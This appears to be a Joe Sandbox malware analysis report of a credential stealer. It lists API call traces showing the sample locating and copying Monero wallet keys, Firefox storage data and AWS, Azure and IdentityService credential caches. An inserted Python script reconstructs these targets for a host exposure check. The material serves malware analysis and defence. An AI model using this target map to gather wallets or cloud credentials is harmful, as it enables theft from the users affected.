                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                            • String ID:
                            • API String ID: 2857443207-0
                            • Opcode ID: c26b7ee55a5e53ce92ce6415304de18edfb7ee1079f4c1339991b250a7f20915
                            • Instruction ID: c66fdf029734210bdd51dcffd642cc18ddb9b129c77df5ae930d0a8e26db1ab6
                            • Opcode Fuzzy Hash: c26b7ee55a5e53ce92ce6415304de18edfb7ee1079f4c1339991b250a7f20915
                            • Instruction Fuzzy Hash: CCE13B31A51A1A9BCB21EFA4DD89ABE77B9EF44300F084029F905E7211DB74DD45CBB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76445
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76480
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D764AA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D764E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76506
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7650E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76537
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                             • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FolderPathlstrcat
                            • String ID: \..\
                            • API String ID: 2938889746-4220915743
                            • Opcode ID: f6fe242879a0cb7046648b2440bdfdaa92d9363c2426cbf410391f95004f1499
                            • Instruction ID: c9bd22044f36a48fdfaf74f03b387ab5680ac39155405bafe3de6c2ac8a089b2
                            • Opcode Fuzzy Hash: f6fe242879a0cb7046648b2440bdfdaa92d9363c2426cbf410391f95004f1499
                            • Instruction Fuzzy Hash: C9F1BC70A11A0A9BCB21EF78D849AAE77B4EF44300F088169F819DB251FB74DD45CBB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D743A3
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D743D6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D743FE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D74409
                            • lstrlen.KERNEL32(\storage\default\), ref: 00D74414
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74431
                            • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00D7443D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74466
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D74471
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74498
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D744D7
                            • lstrcat.KERNEL32(00000000,?), ref: 00D744DF
                            • lstrlen.KERNEL32(00D91794), ref: 00D744EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74507
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D74513
                            • lstrlen.KERNEL32(.metadata-v2), ref: 00D7451E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7453B
                            • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00D74547
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7456E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D745A0
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D745A7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D74601
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7462A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D74653
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7467B
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D746AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                             • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                            • String ID: .metadata-v2$\storage\default\
                            • API String ID: 1033685851-762053450
                            • Opcode ID: 72dee71e767faf22ae3b3d69f8c9b3584f91a52d9fb0d5d58002db594fa80203
                            • Instruction ID: f6d623678695e2bafe7505b55bf202ba4d35585470b6eac50e8b70fddc18c865
                            • Opcode Fuzzy Hash: 72dee71e767faf22ae3b3d69f8c9b3584f91a52d9fb0d5d58002db594fa80203
                            • Instruction Fuzzy Hash: 7FB19431A126169BCB22EFB8DD49AAE77B8EF44300F094129F849D7251EB74DD018BB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D757D5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00D75804
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75835
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7585D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D75868
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75890
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D758C8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D758D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D758F8
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7592E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75956
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D75961
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75988
                            • lstrlen.KERNEL32(00D91794), ref: 00D7599A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D759B9
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D759C5
                            • lstrlen.KERNEL32(00BFCD80), ref: 00D759D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D759F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D75A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75A2C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75A58
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D75A5F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D75AB7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D75B2D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D75B56
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D75B89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75BB5
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D75BEF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D75C4C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75C70
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                             • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2428362635-0
                            • Opcode ID: 2d134bd3248002fbe6d0dc9a204ddb8397772b641bda12b94f271a7aaa0bfe48
                            • Instruction ID: 48cfd9e62db33765297081b07b2352a78c86a62b3e393492cbd5f8c212afed47
                            • Opcode Fuzzy Hash: 2d134bd3248002fbe6d0dc9a204ddb8397772b641bda12b94f271a7aaa0bfe48
                            • Instruction Fuzzy Hash: 9902B571911A099FCB21EFA8D889AAE77B5EF44300F18812DF809D7254EBB4DD45CBB1
                            APIs
                              • Part of subcall function 00D61120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D61135
                              • Part of subcall function 00D61120: RtlAllocateHeap.NTDLL(00000000), ref: 00D6113C
                              • Part of subcall function 00D61120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00D61159
                              • Part of subcall function 00D61120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00D61173
                              • Part of subcall function 00D61120: RegCloseKey.ADVAPI32(?), ref: 00D6117D
                            • lstrcat.KERNEL32(?,00000000), ref: 00D611C0
                            • lstrlen.KERNEL32(?), ref: 00D611CD
                            • lstrcat.KERNEL32(?,.keys), ref: 00D611E8
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6121F
                            • lstrlen.KERNEL32(00BF8F90), ref: 00D6122D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61251
                            • lstrcat.KERNEL32(00000000,00BF8F90), ref: 00D61259
                            • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00D61264
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61288
                            • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00D61294
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D612BA
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D612FF
                            • lstrlen.KERNEL32(00BFCD98), ref: 00D6130E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61335
                            • lstrcat.KERNEL32(00000000,?), ref: 00D6133D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61378
                            • lstrcat.KERNEL32(00000000), ref: 00D61385
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D613AC
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00D613D5
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61401
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6143D
                              • Part of subcall function 00D7EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00D7EE12
                            • DeleteFileA.KERNEL32(?), ref: 00D61471
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                             • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                            • String ID: .keys$\Monero\wallet.keys
                            • API String ID: 2881711868-3586502688
                            • Opcode ID: 2b4e717b33cdae5696cd216ee16495238fa23b9fd8b3ecf83dc1e7628646e7e5
                            • Instruction ID: 96b9ec80955ef9ed156d08b7291482c51e6d4e6dac557d38751f700d92696b4c
                            • Opcode Fuzzy Hash: 2b4e717b33cdae5696cd216ee16495238fa23b9fd8b3ecf83dc1e7628646e7e5
                            • Instruction Fuzzy Hash: 5EA1A575A1161A9BCB21EFB4DC4AAAE77B9EF48300F0C4029F905E7251DB70DD458BB4
                            APIs
                            • memset.MSVCRT ref: 00D7E740
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00D7E769
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E79F
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7E7AD
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00D7E7C6
                            • memset.MSVCRT ref: 00D7E805
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00D7E82D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E85F
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7E86D
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00D7E886
                            • memset.MSVCRT ref: 00D7E8C5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00D7E8F1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E920
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7E92E
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00D7E947
                            • memset.MSVCRT ref: 00D7E986
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                             • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$memset$FolderPathlstrcpy
                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 4067350539-3645552435
                            • Opcode ID: c79a1aa9a9cae533baac2e05e600e53960aeb1a35249b71e56a45f5ab33260a9
                            • Instruction ID: 5e53e67e03714e34edb15f89a14231ffa1c05323247c4196033bce4f7acec469
                            • Opcode Fuzzy Hash: c79a1aa9a9cae533baac2e05e600e53960aeb1a35249b71e56a45f5ab33260a9
                            • Instruction Fuzzy Hash: 1F71E871A50219AFDB21EBB4DC46FFD7374EF48700F444499B7199B181EAB09A888B74
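The two entries above (the Monero wallet routine around 00D61120/00D611C0 and the .azure/.aws/.IdentityService routine at 00D7E740) show the sample building file paths from SHGetFolderPathA results and from a registry value, then calling CopyFileA with bFailIfExists set and later DeleteFileA, consistent with staging a copy of the target file. The constants decode as follows: CSIDL 0x1A is APPDATA, 0x1C is LOCAL_APPDATA, 0x28 is PROFILE; the registry root 0x80000001 is HKEY_CURRENT_USER; the access mask 0x20119 is KEY_READ | KEY_WOW64_64KEY. The Python script below is an added example for this report, not Joe Sandbox or Stealc code: it parses trace lines copied from those two entries, replays them to reconstruct the registry values and file paths the code reaches for, and then checks a profile directory for those paths. The temporary profile it creates is constructed for the offline run; the fallback \Monero\wallet.keys path is left out because its base string (heap pointer 00BF8F90) is not resolved in the trace.

```python
import os
import re
import tempfile

# Trace lines copied from the two entries above (constructed sample input:
# only the calls that build paths or touch files are kept, in report order).
TRACE_LINES = [
    r"RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00D61159",
    r"RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00D61173",
    r"lstrcat.KERNEL32(?,.keys), ref: 00D611E8",
    r"CopyFileA.KERNEL32(?,?,00000001), ref: 00D613D5",
    r"DeleteFileA.KERNEL32(?), ref: 00D61471",
    r"SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00D7E769",
    r"lstrcat.KERNEL32(?,\.azure\), ref: 00D7E7C6",
    r"SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00D7E82D",
    r"lstrcat.KERNEL32(?,\.aws\), ref: 00D7E886",
    r"SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00D7E8F1",
    r"lstrcat.KERNEL32(?,\.IdentityService\), ref: 00D7E947",
]

# Documented Windows constants (shell32 CSIDL values, predefined HKEYs,
# registry access rights); these come from the Windows SDK, not the report.
CSIDL = {0x1A: "APPDATA", 0x1C: "LOCAL_APPDATA", 0x28: "PROFILE"}
HKEY = {0x80000001: "HKCU", 0x80000002: "HKLM"}
KEY_READ, KEY_WOW64_64KEY = 0x20019, 0x100

CALL_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\), ref: ([0-9A-F]{8})$")


def parse_call(line):
    """Split one '<api>.<module>(<args>), ref: <addr>' line into its parts."""
    m = CALL_RE.match(line.strip())
    if not m:
        raise ValueError("not a trace line: %r" % line)
    api, module, args, ref = m.groups()
    return api, module, args.split(",") if args else [], int(ref, 16)


def as_int(arg):
    """Numeric trace arguments are 8 hex digits; '?' or a string gives None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-F]{8}", arg) else None


def reconstruct_targets(lines):
    """Replay the calls in order and list what the code reaches for: registry
    values it reads and file paths built as <known folder> + literal suffix."""
    targets, base, reg_key = [], None, None
    for line in lines:
        api, _, args, _ = parse_call(line)
        if api == "SHGetFolderPathA":
            csidl = as_int(args[1])
            base = "%%%s%%" % CSIDL.get(csidl, "CSIDL_%X" % csidl)
        elif api == "RegOpenKeyExA":
            mask = as_int(args[3])
            rights = "KEY_READ" if (mask & KEY_READ) == KEY_READ else hex(mask)
            if mask & KEY_WOW64_64KEY:
                rights += "|KEY_WOW64_64KEY"
            reg_key = "%s\\%s" % (HKEY.get(as_int(args[0]), args[0]), args[1])
            targets.append("reg: %s (%s)" % (reg_key, rights))
        elif api == "RegQueryValueExA" and reg_key:
            targets.append("reg: %s\\%s" % (reg_key, args[1]))
            base = "<%s\\%s>" % (reg_key, args[1])   # value becomes the next path base
        elif api == "lstrcat" and base and len(args) > 1 and args[1][:1] in ("\\", "."):
            targets.append("file: %s%s" % (base, args[1]))
        elif api in ("CopyFileA", "DeleteFileA"):
            targets.append("op: %s" % api)           # stage a copy, then delete
    return targets


def locate_on_host(targets, folders):
    """Resolve %FOLDER% placeholders with a mapping that stands in for the
    SHGetFolderPathA results and return the file targets that exist."""
    found = []
    for t in targets:
        if not t.startswith("file: %"):
            continue
        path = t[len("file: "):]
        for name, root in folders.items():
            path = path.replace("%%%s%%" % name, root)
        path = path.replace("\\", os.sep)
        if os.path.exists(path):
            found.append(path)
    return found


def demo():
    """Offline run against a throwaway profile that only has a .aws directory
    (constructed); on a live host, map the names to the real known folders."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, ".aws"))
    folders = {
        "PROFILE": root,
        "LOCAL_APPDATA": os.path.join(root, "AppData", "Local"),
        "APPDATA": os.path.join(root, "AppData", "Roaming"),
    }
    targets = reconstruct_targets(TRACE_LINES)
    return targets, locate_on_host(targets, folders)


if __name__ == "__main__":
    targets, found = demo()
    print("\n".join(targets))
    print("present on host:", found)
```

On a real Windows host the `folders` mapping would be filled from the same known-folder lookups the sample uses (for example `%USERPROFILE%`, `%LOCALAPPDATA%` and `%APPDATA%` from the environment), which turns the reconstructed list into a quick check of which credential caches were exposed to this stealer on a given user profile.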
                            APIs
                            • lstrcpy.KERNEL32 ref: 00D7ABCF
                            • lstrlen.KERNEL32(00BFDEE0), ref: 00D7ABE5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AC0D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7AC18
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AC41
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AC84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7AC8E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7ACB7
                            • lstrlen.KERNEL32(00D94AD4), ref: 00D7ACD1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7ACF3
                            • lstrcat.KERNEL32(00000000,00D94AD4), ref: 00D7ACFF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AD28
                            • lstrlen.KERNEL32(00D94AD4), ref: 00D7AD3A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AD5C
                            • lstrcat.KERNEL32(00000000,00D94AD4), ref: 00D7AD68
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AD91
                            • lstrlen.KERNEL32(00BFDF40), ref: 00D7ADA7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7ADCF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7ADDA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AE03
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7AE3F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7AE49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AE6F
                            • lstrlen.KERNEL32(00000000), ref: 00D7AE85
                            • lstrcpy.KERNEL32(00000000,00BFDF88), ref: 00D7AEB8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                             • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
